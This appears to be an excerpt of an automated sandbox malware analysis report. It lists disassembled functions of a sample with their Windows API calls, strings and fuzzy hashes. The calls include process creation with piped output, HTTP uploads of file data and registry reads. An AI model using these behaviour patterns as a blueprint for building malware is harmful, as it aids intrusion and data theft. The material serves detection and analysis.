                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6847a3e9a0d7b7b8402b77278032b4f626891dfa6fd65570ac05521b0549e8d7
                • Instruction ID: 588b4cea28ed3d0c3a1beac742f9e8917cd619fa0cfe4b6d460012cd0620b0e4
                • Opcode Fuzzy Hash: 6847a3e9a0d7b7b8402b77278032b4f626891dfa6fd65570ac05521b0549e8d7
                • Instruction Fuzzy Hash: 14E08C329252A8EBCB15DB89C90498EF3ECEB48B40B110096B515D3202C670DF00DBD0
                APIs
                • GetTempPathA.KERNEL32(00000080,?,?,?,?,?,?,?,?,?), ref: 00CB832D
                • CreatePipe.KERNEL32(00000000,00000000,0000000C,00000000), ref: 00CB8403
                • SetHandleInformation.KERNEL32(00000000,00000001,00000000), ref: 00CB8415
                • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 00CB8459
                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00000044,?), ref: 00CB8481
                • Wow64RevertWow64FsRedirection.KERNEL32(00000000), ref: 00CB848F
                • WaitForSingleObject.KERNEL32(?,00000064), ref: 00CB84B8
                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CB84DA
                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CB84FE
                • ReadFile.KERNEL32(00000000,?,0000007F,00000000,00000000), ref: 00CB8525
                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CB856A
                • CloseHandle.KERNEL32(?), ref: 00CB8581
                • CloseHandle.KERNEL32(?), ref: 00CB8589
                • CloseHandle.KERNEL32(00000000), ref: 00CB8591
                • CloseHandle.KERNEL32(00000000), ref: 00CB8599
                • GetLastError.KERNEL32 ref: 00CB85A3
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: Handle$ClosePipeWow64$NamedPeek$CreateRedirection$DisableErrorFileInformationLastObjectPathProcessReadRevertSingleTempWait
                • String ID: D
                • API String ID: 3215130363-2746444292
                • Opcode ID: b554dc2b8b9b4d100fdfc1fb6c0d75b984c880d6c873476e86b61d827ce29300
                • Instruction ID: 2a7b217506e10561a1587a0be228c00a19836094c9109428311480fb940ae6d2
                • Opcode Fuzzy Hash: b554dc2b8b9b4d100fdfc1fb6c0d75b984c880d6c873476e86b61d827ce29300
                • Instruction Fuzzy Hash: B5A17071D40219ABEB20DF64CC45BDDB7B9AB04704F1041D6FA08A6291DB75AF88CFA1
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: _free$___from_strstr_to_strchr
                • String ID:
                • API String ID: 3409252457-0
                • Opcode ID: 28061dc5d3e907b20e606777f96c5dd3fd19e66c3909913e99a3b92df8826527
                • Instruction ID: c8d0da4fbcfac40d7ef2343adc74e8c673ec76d3e0e5c0740e8f2f60d23560d8
                • Opcode Fuzzy Hash: 28061dc5d3e907b20e606777f96c5dd3fd19e66c3909913e99a3b92df8826527
                • Instruction Fuzzy Hash: A8D14C71900349AFDB60AFB58C51A7E77F8AF00B10F24812DEA25D7293EF319A45D762
                APIs
                • HttpOpenRequestA.WININET(00000000,00000000), ref: 00CC0058
                • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 00CC00A8
                • HttpSendRequestExA.WININET(00000000,00000028,00000000,00000008,00000000), ref: 00CC00DA
                • InternetWriteFile.WININET(00000000,?,?,?), ref: 00CC00FA
                • ReadFile.KERNEL32(00000000,?,00000004,00000010,00000000), ref: 00CC0141
                • InternetWriteFile.WININET(00000000,?,00000010,?), ref: 00CC016E
                • InternetWriteFile.WININET(00000000,?,?,?), ref: 00CC01CA
                • HttpEndRequestW.WININET(00000000,00000000,00000008,00000000), ref: 00CC01EC
                • InternetCloseHandle.WININET(00000000), ref: 00CC01FD
                • InternetCloseHandle.WININET(?), ref: 00CC0207
                • InternetCloseHandle.WININET(00000000), ref: 00CC0211
                • CloseHandle.KERNEL32(00000000), ref: 00CC021D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: Internet$CloseFileHandleHttpRequest$Write$HeadersOpenReadSend
                • String ID: YJ3RNw==
                • API String ID: 1606393314-402170223
                • Opcode ID: bb3122ee03779cc6c3b2a7f63ede844c85ea326d00cbb515efd2ad7883397599
                • Instruction ID: 5c3a5a3e0c5668b9d617d71b48a727be3ed9f0d6bd1747727ff56bab57129d65
                • Opcode Fuzzy Hash: bb3122ee03779cc6c3b2a7f63ede844c85ea326d00cbb515efd2ad7883397599
                • Instruction Fuzzy Hash: 4FC1AE32A00114DBEB28CF68CC89F9DB776EF85304F24829CE518E7295DB34DA818B65
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: _free$Info
                • String ID:
                • API String ID: 2509303402-0
                • Opcode ID: e3040ec9bf589dfb0b11f22c08d478daf4cec45fa4abff473533f519fac044ad
                • Instruction ID: 241fb1d430bf5db4aae37a447cb59a1341dadd2f1cf8d19cd08858a2123fa243
                • Opcode Fuzzy Hash: e3040ec9bf589dfb0b11f22c08d478daf4cec45fa4abff473533f519fac044ad
                • Instruction Fuzzy Hash: C6D18171D003459FDB21DF76C881BEEBBF9BF08300F144569E4AAA7242DB71A945DB60
                APIs
                • InitializeCriticalSectionAndSpinCount.KERNEL32(00D18FA8,00000FA0,?,?,00CD9828), ref: 00CD9856
                • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00CD9828), ref: 00CD9861
                • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00CD9828), ref: 00CD9872
                • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00CD9884
                • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00CD9892
                • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00CD9828), ref: 00CD98B5
                • DeleteCriticalSection.KERNEL32(00D18FA8,00000007,?,?,00CD9828), ref: 00CD98D1
                • CloseHandle.KERNEL32(00000000,?,?,00CD9828), ref: 00CD98E1
                Strings
                • SleepConditionVariableCS, xrefs: 00CD987E
                • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00CD985C
                • WakeAllConditionVariable, xrefs: 00CD988A
                • kernel32.dll, xrefs: 00CD986D
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                • API String ID: 2565136772-3242537097
                • Opcode ID: 94582c6817151c8dc93770cfe3af561860f5e9fdf6ea4fcd28364b803b593567
                • Instruction ID: 02c377185f1a586e9a6a108650da68d43f3d437e20711239431c2ca5df565eba
                • Opcode Fuzzy Hash: 94582c6817151c8dc93770cfe3af561860f5e9fdf6ea4fcd28364b803b593567
                • Instruction Fuzzy Hash: 9801B138A453016FD7209B74BC0DB6A3669EF86F91F040026FA18D73D0DF70C942A634
                APIs
                • ___free_lconv_mon.LIBCMT ref: 00CF15A1
                  • Part of subcall function 00CF0857: _free.LIBCMT ref: 00CF0874
                  • Part of subcall function 00CF0857: _free.LIBCMT ref: 00CF0886
                  • Part of subcall function 00CF0857: _free.LIBCMT ref: 00CF0898
                  • Part of subcall function 00CF0857: _free.LIBCMT ref: 00CF08AA
                  • Part of subcall function 00CF0857: _free.LIBCMT ref: 00CF08BC
                  • Part of subcall function 00CF0857: _free.LIBCMT ref: 00CF08CE
                  • Part of subcall function 00CF0857: _free.LIBCMT ref: 00CF08E0
                  • Part of subcall function 00CF0857: _free.LIBCMT ref: 00CF08F2
                  • Part of subcall function 00CF0857: _free.LIBCMT ref: 00CF0904
                  • Part of subcall function 00CF0857: _free.LIBCMT ref: 00CF0916
                  • Part of subcall function 00CF0857: _free.LIBCMT ref: 00CF0928
                  • Part of subcall function 00CF0857: _free.LIBCMT ref: 00CF093A
                  • Part of subcall function 00CF0857: _free.LIBCMT ref: 00CF094C
                • _free.LIBCMT ref: 00CF1596
                  • Part of subcall function 00CE8006: HeapFree.KERNEL32(00000000,00000000,?,00CF0FAC,?,00000000,?,8B18EC83,?,00CF124F,?,00000007,?,?,00CF16F4,?), ref: 00CE801C
                  • Part of subcall function 00CE8006: GetLastError.KERNEL32(?,?,00CF0FAC,?,00000000,?,8B18EC83,?,00CF124F,?,00000007,?,?,00CF16F4,?,?), ref: 00CE802E
                • _free.LIBCMT ref: 00CF15B8
                • _free.LIBCMT ref: 00CF15CD
                • _free.LIBCMT ref: 00CF15D8
                • _free.LIBCMT ref: 00CF15FA
                • _free.LIBCMT ref: 00CF160D
                • _free.LIBCMT ref: 00CF161B
                • _free.LIBCMT ref: 00CF1626
                • _free.LIBCMT ref: 00CF165E
                • _free.LIBCMT ref: 00CF1665
                • _free.LIBCMT ref: 00CF1682
                • _free.LIBCMT ref: 00CF169A
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                • String ID:
                • API String ID: 161543041-0
                • Opcode ID: 7a5c36326c35e057fe6874b983afccfc6434a7d021a47c51aa367680f1d32b69
                • Instruction ID: 6b654ce2a8917448dcbeb6c90e9cc2458db51834797fbb4efcdbb5f7932063e9
                • Opcode Fuzzy Hash: 7a5c36326c35e057fe6874b983afccfc6434a7d021a47c51aa367680f1d32b69
                • Instruction Fuzzy Hash: 5C318171600749DFDB706A3AD805B6677EAEF40350F184829F96AE7151DF30EE88EB11
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: _free
                • String ID:
                • API String ID: 269201875-0
                • Opcode ID: e0e2145ff212a55a5b60016bbabab3d8b6c25238227eb3d58af469d3e514c5e4
                • Instruction ID: 606ae811e4ca8345942ae5eb98fbaf4760c46562b9f8358bc6ca63d51914ad87
                • Opcode Fuzzy Hash: e0e2145ff212a55a5b60016bbabab3d8b6c25238227eb3d58af469d3e514c5e4
                • Instruction Fuzzy Hash: 11C13476D40208AFDB60DBA9CD42FEF77F8AB08B00F144165FA15FB282D6709E449B61
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID: 0-3907804496
                • Opcode ID: 43f883b55917b4d7b6d9f53f913eb4e195b3940ec00dd537c2a9e42fb1969b00
                • Instruction ID: 4dc4d77f6fdcbf9ac17013338b1b69abbc4a6d750ee8201ed1511a9bf66dcdd3
                • Opcode Fuzzy Hash: 43f883b55917b4d7b6d9f53f913eb4e195b3940ec00dd537c2a9e42fb1969b00
                • Instruction Fuzzy Hash: 26C10170A04285AFCB15DFAAD891BBEBBB4BF48310F144059F955AB392C731DE42CB61
                APIs
                  • Part of subcall function 00CF35A8: CreateFileW.KERNEL32(00000000,00000000,?,00CF3998,?,?,00000000,?,00CF3998,00000000,0000000C), ref: 00CF35C5
                • GetLastError.KERNEL32 ref: 00CF3A03
                • __dosmaperr.LIBCMT ref: 00CF3A0A
                • GetFileType.KERNEL32(00000000), ref: 00CF3A16
                • GetLastError.KERNEL32 ref: 00CF3A20
                • __dosmaperr.LIBCMT ref: 00CF3A29
                • CloseHandle.KERNEL32(00000000), ref: 00CF3A49
                • CloseHandle.KERNEL32(00CE7241), ref: 00CF3B96
                • GetLastError.KERNEL32 ref: 00CF3BC8
                • __dosmaperr.LIBCMT ref: 00CF3BCF
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                • String ID: H
                • API String ID: 4237864984-2852464175
                • Opcode ID: aa9d11ef33570b913e48dd8fe83da57894877882b3cc560d026d3371eee19ffc
                • Instruction ID: 7abca1081809d193b11b932d48cbd485ad33be80af8c5f6d1e2d2b3abc1f1d62
                • Opcode Fuzzy Hash: aa9d11ef33570b913e48dd8fe83da57894877882b3cc560d026d3371eee19ffc
                • Instruction Fuzzy Hash: BCA15931A00288AFCF19AF68DC617FD7BA1AB06320F140149F911EF3A1CB759E52D762
                APIs
                • IsInExceptionSpec.LIBVCRUNTIME ref: 00CDCC6F
                • type_info::operator==.LIBVCRUNTIME ref: 00CDCC91
                • ___TypeMatch.LIBVCRUNTIME ref: 00CDCDA0
                • IsInExceptionSpec.LIBVCRUNTIME ref: 00CDCE72
                • _UnwindNestedFrames.LIBCMT ref: 00CDCEF6
                • CallUnexpected.LIBVCRUNTIME ref: 00CDCF11
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                • String ID: csm$csm$csm
                • API String ID: 2123188842-393685449
                • Opcode ID: f23ecbee6a232097d4048f18dcf734fb5749ce7285bd070c9660a72a59ec5845
                • Instruction ID: 4dd27ac85feb1e5927af9fb48e6b3a032de9dd12070576e743874d857aa6b7f5
                • Opcode Fuzzy Hash: f23ecbee6a232097d4048f18dcf734fb5749ce7285bd070c9660a72a59ec5845
                • Instruction Fuzzy Hash: 72B1587180020AEFCF29DFA4C9C19AEBBB6BF54310B14415BEA256B312D731DA51DF91
                APIs
                • _free.LIBCMT ref: 00CE6B1E
                  • Part of subcall function 00CE8006: HeapFree.KERNEL32(00000000,00000000,?,00CF0FAC,?,00000000,?,8B18EC83,?,00CF124F,?,00000007,?,?,00CF16F4,?), ref: 00CE801C
                  • Part of subcall function 00CE8006: GetLastError.KERNEL32(?,?,00CF0FAC,?,00000000,?,8B18EC83,?,00CF124F,?,00000007,?,?,00CF16F4,?,?), ref: 00CE802E
                • _free.LIBCMT ref: 00CE6B2A
                • _free.LIBCMT ref: 00CE6B35
                • _free.LIBCMT ref: 00CE6B40
                • _free.LIBCMT ref: 00CE6B4B
                • _free.LIBCMT ref: 00CE6B56
                • _free.LIBCMT ref: 00CE6B61
                • _free.LIBCMT ref: 00CE6B6C
                • _free.LIBCMT ref: 00CE6B77
                • _free.LIBCMT ref: 00CE6B85
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 422861fc5e9dd5812bd22a387bf8cfad76068ec3bea343c5829d93d5eae6b6e2
                • Instruction ID: f21740be17e5ba176ced73f739d9d9526f73c0e78135877c24b127e1dffec964
                • Opcode Fuzzy Hash: 422861fc5e9dd5812bd22a387bf8cfad76068ec3bea343c5829d93d5eae6b6e2
                • Instruction Fuzzy Hash: A1218C76910248BFCB41EF95C981DDD7BB9FF08340F014565F519AB161EB31EA58EB80
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: CloseOpenQueryValue
                • String ID: 111$1F==$246122658369$3Iy=$NsPs3TF3$TLG+$TV==
                • API String ID: 3677997916-3127814687
                • Opcode ID: e0d59ab6a09d0b559f9221ca5d7fad4b54e8cf1a7418445f7192c69fb555783a
                • Instruction ID: 05c86ff595c65363f0d50ee2116f43e3d5132e384b421f769a42f5de7664f048
                • Opcode Fuzzy Hash: e0d59ab6a09d0b559f9221ca5d7fad4b54e8cf1a7418445f7192c69fb555783a
                • Instruction Fuzzy Hash: A2E1B070D00288EBEF14EFA8C949BDDBFB5AF05304F50819DE5146B382D7755A48DBA2
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: _free
                • String ID:
                • API String ID: 269201875-0
                • Opcode ID: f125a93af231a9fe5fda648a83cf210cc9a76cf14208f545e57a3a66ac8bb192
                • Instruction ID: 1784f07ae77fc3c5fd60add92570609c8598be63f5dbee4cc3877eafcd22c717
                • Opcode Fuzzy Hash: f125a93af231a9fe5fda648a83cf210cc9a76cf14208f545e57a3a66ac8bb192
                • Instruction Fuzzy Hash: B861F771900309AFD760DFA5C841BBBB7F5EF44B10F204919EA65EB282EB30AD05DB51
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: CurrentThread$_xtime_get$Xtime_diff_to_millis2
                • String ID:
                • API String ID: 3943753294-0
                • Opcode ID: fe2544f865b4c569a7d8e55516e655040b5cee5fed38a7d1e8a83377306dfc5c
                • Instruction ID: 08c536c39cbe7cbd707075e0495a6cdba876c74d01dafca8f6f018b770ad35cc
                • Opcode Fuzzy Hash: fe2544f865b4c569a7d8e55516e655040b5cee5fed38a7d1e8a83377306dfc5c
                • Instruction Fuzzy Hash: 8B51AF3490120ACFCF14DF64C985AA9B7B5EF55310B24849BDA16EB391DB30EE48CBA1
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: CloseHandleclosesocket
                • String ID: 246122658369$3Iy=$3YG=$invalid stoi argument$stoi argument out of range
                • API String ID: 2025136489-368694340
                • Opcode ID: d50a764fef9799705b36fe29af400c92175edaa2eacb99b1b261a9725d39fabc
                • Instruction ID: 70d518b7726a63b48370ae592e4d86f3139870a6a4cdd72714779bd7b091887e
                • Opcode Fuzzy Hash: d50a764fef9799705b36fe29af400c92175edaa2eacb99b1b261a9725d39fabc
                • Instruction Fuzzy Hash: 91414771A00248ABDB08EF38CD4AB9D7F65EB85354F50824DF811D73C6CB399A8087E2
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                • Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd
                Similarity
                • API ID: Mtx_unlock$Rethrow_future_exceptionstd::_$Cnd_broadcast
                • String ID:
                • API String ID: 3990724213-0
                • Opcode ID: 6fe0a8ae9a3c8a6d124c95f17b10df8f27f2b68032be4f32e414403cfad0b77a
